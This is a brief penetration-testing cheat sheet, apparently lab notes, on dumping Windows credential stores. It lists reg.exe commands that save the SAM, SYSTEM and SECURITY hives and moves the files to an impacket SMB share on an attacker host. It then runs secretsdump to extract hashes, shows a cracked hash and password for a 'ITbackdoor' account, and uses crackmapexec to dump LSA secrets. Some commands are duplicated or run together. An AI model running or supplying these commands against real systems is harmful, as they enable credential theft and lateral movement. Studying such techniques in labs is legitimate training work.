Attacking SAM
June 05, 2024

reg.exe save hklm\sam C:\sam.save
reg.exe save hklm\system C:\system.save
reg.exe save hklm\security C:\security.save






Last updated
June 05, 2024

reg.exe save hklm\sam C:\sam.save
reg.exe save hklm\system C:\system.save
reg.exe save hklm\security C:\security.save






Last updated
mkdir TryShare
sudo impacket-smbserver -smb2support SamData TrySharemove sam.save \\10.10.15.238\SamData
move security.save \\10.10.15.238\SamData
move system.save \\10.10.15.238\SamDatasudo impacket-secretsdump -sam sam.save -security security.save -system system.save LOCALUser - ITbackdoor
c02478537b9727d391bc80011c2e2321:matrix# It will dump the lsa
poetry run crackmapexec smb 10.129.202.137 --local-auth -u ITbackdoor -p matrix --lsa